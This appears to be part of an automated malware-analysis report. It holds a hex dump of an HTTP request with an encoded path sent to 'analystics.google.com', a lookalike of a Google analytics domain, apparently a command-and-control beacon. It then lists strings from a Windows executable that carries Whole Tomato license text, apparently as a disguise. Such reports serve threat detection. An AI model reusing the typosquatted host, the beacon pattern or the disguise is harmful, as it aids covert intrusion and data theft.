0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677766 44463333 72467650 766f7944   ygwfDF33rFvPvoyD
0x000000b0 (00176)   486a3279 6f697942 36475454 4c2b4573   Hj2yoiyB6GTTL+Es
0x000000c0 (00192)   6a594675 2f423077 35762f47 42204854   jYFu/B0w5v/GB HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....


Strings
P.rsrcV
\
.CC
 
vttceuritorla..H
l
.
.
'
K
.

;18Gt
@1~T
ELeEJ
                                 H
         (((((                  H
         h((((                  H
@jjh
kernel32.dll
KERNEL32.DLL
mscoree.dll
ntdll.dll
TIMER1
u#bJ[oU
<<<<<<<
                          
;;;;???
{{{{{{{
\$[[[,
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
|0oc2U
0SSSSS
1$DAIzV
1H-.[W<
}1#rck
[||.1,(Svq'
]2222"
222244#
~2Jh08k
2z<j1M\
{{{{{{{3
{{{{{{{33
{{{{{{{330
3333333
33333330
33333333
3cqA6	xT0SL
3,|&l)
3@ [M0
:&4[2)
4hiDh!u
/4P=3]
4tQyjf
4U>z93
555555OO
55555OOOO
5T\$?)
6~4e;~
)69|#3
6JAZ&P
7dlS]o
7,||h)
7lvD+?{S
>8_9\x}f
8SOFTu
93wH_[
9BlH?R
9s5~Vrnd
9zUxwxb
ABBlcx
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABhQE~
acccc0UU0_
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
b3!G'd
BeginPaint
,CLnM9
CloseHandle
"^Clq}7
CMMMb"d:
CoInitialize
CorExitProcess
CoTaskMemAlloc
c$@QwWrY
- CRT not initialized
CVjQ1T
:>_:d-
d0F&c.'
D`85Z5
@.data
DDDDDD@
DDDDDDDDDDD
DDDDDDGpw
dddd, MMMM dd, yyyy
December
DecodePointer
DeleteCriticalSection
DeviceIoControl
DISCLAIMER OF WARRANTY. THE SOFTWARE, AND ANY SERVICES THAT YOU RECEIVE FROM WHOLE TOMATO ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND. WHOLE TOMATO HEREBY DISCLAIMS ALL EXPRESS OR IMPLIED WARRANTIES, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS AGREEMENT. SOME STATES DO NOT ALLOW EXCLUSIONS OF AN IMPLIED WARRANTY, SO THIS DISCLAIMER MAY NOT APPLY TO YOU AND YOU MAY HAVE OTHER LEGAL RIGHTS THAT VARY FROM STATE TO STATE OR BY JURISDICTION. 
DOMAIN error
eHr:5EN
Ellipse
eLYVEf
EncodePointer
EndPaint
EnKy2i
EnterCriticalSection
-|*]eSS
ExitProcess
EXPORT CONTROLS. You shall comply with all export laws and restrictions and regulations of the Department of Commerce, the United States Department of Treasury Office of Foreign Assets Control ("OFAC"), or other United States or foreign agency or authority, and not to export, or allow the export or re-export of the Software in violation of any such restrictions, laws or regulations (including, without limitation, export or re-export to destinations prohibited either in Country Groups Q, S, W, Y or Z country specified in the then current Supplement No. 1 to Section 770 of the U.S. Export Administration Regulations (or any successor supplement or regulations), or the OFAC regulations found at 31 C.F.R. 500 et seq.). By installing or using the Software, you are agreeing to the foregoing and you are representing and warranting that you are not located in, under the control of, or a national or resident of any restricted country or on any such list. 
/ez9u 
|F>%<0p
f|,d9y
February
FF1[$?g
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
fqY!Kr
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
((^^F-w
GDI32.dll
GetACP
GetActiveWindow
GetClientRect
GetCommandLineA
GetCommandLineW
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemMetrics
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
Gi,lzD
gRRRRRR====
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
h{egF3
HH:mm:ss
HU.n`!
i19lgC2
ih	j1_}
(<*IkH
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
iRoky^
IsDebuggerPresent
IsValidCodePage
ivC,<.
{.J 3*L
JanFebMarAprMayJunJulAugSepOctNovDec
January
>{Jba0
j:'?G3
jHZU&^
JJhh-QA222e2
jjjjjjj
jjjjjjjjjW
jjjjjW
j@j ^V
j?{{W2
'.Kc3f8
KERNEL32.dll
$KHI^#
KKKKKK
kO2R{O`
K*`Yg+q
'<l0x9
=l}~9>
!<l&~9
Last modified: May
LCMapStringA
LCMapStringW
LeaveCriticalSection
<lF<yd.ct|
LIMITATION OF LIABILITY. You assume the entire risk as to the quality and performance of the Software. Whole Tomato assumes no liability for the cost of any service or repair if the Software is defective 
LoadLibraryA
LoadResource
Loftware). 
l-p]v'
l_RQ#R 
lstrcmpiA
l<.S`W
lVLHTq
M`3HIa(
m<) A(`
MessageBoxA
M%]<?gS
Microsoft Visual C++ Runtime Library
MM/dd/yy
 )mmhd
Monday
$M%q<E
MultiByteToWideChar
M}~vpL
mx1GG~h
]my~mc
n6|q@@@00
ni]o|w_
nl'?}U
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
NX-wy3
,o1aCU
O/:5\5
\=,o#,8r
October
\O=HHT
ojf_<j}tJ
ole32.dll
oo````GGGG2
~oooooo`o``
O[re&X
<ow.U^}	
oYPMBd
|:P5VY
[pb,y~M
PK<-piv'
Please contact the application's support team for more information.
PostQuitMessage
PPPPPPPP
Program: 
<program name unknown>
'PrZu7RV
- pure virtual function call
QLHv.	GZgx
<QUc?.
QueryPerformanceCounter
q/y!,-
ra o	a;
`.rdata
rDo>i0I
Rectangle
RegisterClassExA
[[//rr
RR11)j
Rt0%2uU
RtlUnwind
runtime error 
Runtime Error!
s)~8rr>
Saturday
September
SetDebugErrorLevel
SetHandleCount
SetLastError
SetParent
SetUnhandledExceptionFilter
/"SG`|j
SING error
skm=`x
SOFTWARE LICENSE AGREEMENT
Sp{!.f
sr(`kQTdy
strcat
Sunday
SunMonTueWedThuFriSat
sUTzC8
T$$$CCC
TerminateProcess
TERMINATION. Whole Tomato may, at its sole discretion, terminate this Agreement, the license granted herein, and your right to use or access the Software at any time. On termination, you must destroy all copies of the Software. 
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
t"SS9]
tttttt
t$<"u	3
Tuesday
;t$,v-
t+WWVPV
- unable to initialize heap
- unable to open console device
UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, TORT, CONTRACT, STRICT LIABILITY, OR OTHERWISE, SHALL WHOLE TOMATO OR ITS LICENSORS, SUPPLIERS OR RESELLERS BE LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOST PROFITS, LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES. IN NO EVENT WILL WHOLE TOMATO BE LIABLE FOR ANY DAMAGES IN EXCESS OF WHOLE TOMATO'S LIST PRICE FOR A LICENSE TO THE SOFTWARE, EVEN IF WHOLE TOMATO SHALL HAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES, OR FOR ANY CLAIM BY ANY OTHER PARTY. THIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION. FURTHERMORE, SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION AND EXCLUSION MAY NOT APPLY TO YOU. 
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UQPXY]Y[
URPQQh`X@
USER32.dll
USER32.DLL
	U;T_H
uuuuuuu
^uwC1F
VEfeJG
V=IR`I
VirtualAlloc
VirtualFree
!vlK.1
v	N+D$
.VS+D+
vz7#Nlu|! U
w.5B6;
Wednesday
WideCharToMultiByte
Wjjjjj
Wjjjjjjjjj
%wjWT,+
wl<()i
w<<nql`
WriteFile
WU(kOZ
wwwwwwwwwww
xFy0$ 
Xg6Tq9
{XH&w?
XII9,#
xI]=\p
xttfffW%
xxxxRxxRRRttg
Y{8.x?
Yi|OTd
>=Yt1j
z<{f]4
z!?NxI)
ZX=7HO